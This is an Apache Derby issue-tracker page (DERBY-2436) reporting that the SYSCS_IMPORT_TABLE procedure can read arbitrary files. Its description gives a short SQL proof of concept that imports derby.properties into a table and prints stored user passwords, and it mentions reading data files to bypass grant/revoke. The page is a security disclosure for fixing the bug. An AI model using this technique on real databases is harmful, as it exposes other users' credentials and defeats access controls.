Derby
  1. Derby
  2. DERBY-2436

SYSCS_IMPORT_TABLE can be used to read derby files

    Details

    • Urgency:
      Normal
    • Bug behavior facts:
      Regression, Security

      Description

      There are no controls over which files SYSCS_IMPORT_TABLE can read, thus allowing any user that has permission to execute the procedure to try and access information that they have no permissions to do so. E.g. even with the secure-by-default network server I can execute three lines of SQL to view to contents of derby.properties, thus seeing passwords of other users, or the address of the ldap server.

      create table t (c varchar(32000));
      CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', 'derby.properties', NULL, NULL, 'ISO8859_1', 0);

      ij> select * from T;
      C

      ----------------------------------------------
      derby.connection.requireAuthentication=true
      derby.authentication.provider=BUILTIN
      derby.user.SA=sapwd
      derby.user.MARY=marypwd

      Also a similar trick could be attempted against the actual data files, allowing a user to attempt to bypass grant/revoke security, especially no that binary data can be exported/imported.

        Issue Links

          Activity

          Daniel John Debrunner created issue -
          Daniel John Debrunner made changes -
          Field Original Value New Value
          Affects Version/s 10.3.1.0 [ 12312541 ]
          Affects Version/s 10.3.0.0 [ 12310800 ]
          Kathey Marsden made changes -
          Affects Version/s 10.1.2.1 [ 12310615 ]
          Affects Version/s 10.2.1.6 [ 11187 ]
          Urgency Urgent
          Affects Version/s 10.3.0.0 [ 12310800 ]
          Kathey Marsden made changes -
          Derby Info [Regression]
          Dag H. Wanvik made changes -
          Link This issue relates to DERBY-2437 [ DERBY-2437 ]
          Dag H. Wanvik made changes -
          Derby Categories [Security]
          Dag H. Wanvik made changes -
          Component/s Security [ 11411 ]
          Dag H. Wanvik made changes -
          Component/s Tools [ 11414 ]
          Dag H. Wanvik made changes -
          Bug behavior facts [Security] [Regression]
          Dag H. Wanvik made changes -
          Bug behavior facts [Regression] [Regression, Security]
          Kathey Marsden made changes -
          Urgency Urgent Normal
          Issue & fix info [High Value Fix]
          Kathey Marsden made changes -
          Labels derby_triage10_5_2
          Kathey Marsden made changes -
          Labels derby_triage10_5_2 derby_triage10_10 derby_triage10_5_2
          Issue & fix info High Value Fix [ 10422 ]
          Gavin made changes -
          Workflow jira [ 12399210 ] Default workflow, editable Closed status [ 12802010 ]

            People

            • Assignee:
              Unassigned
              Reporter:
              Daniel John Debrunner
            • Votes:
              1 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

              • Created:
                Updated:

                Development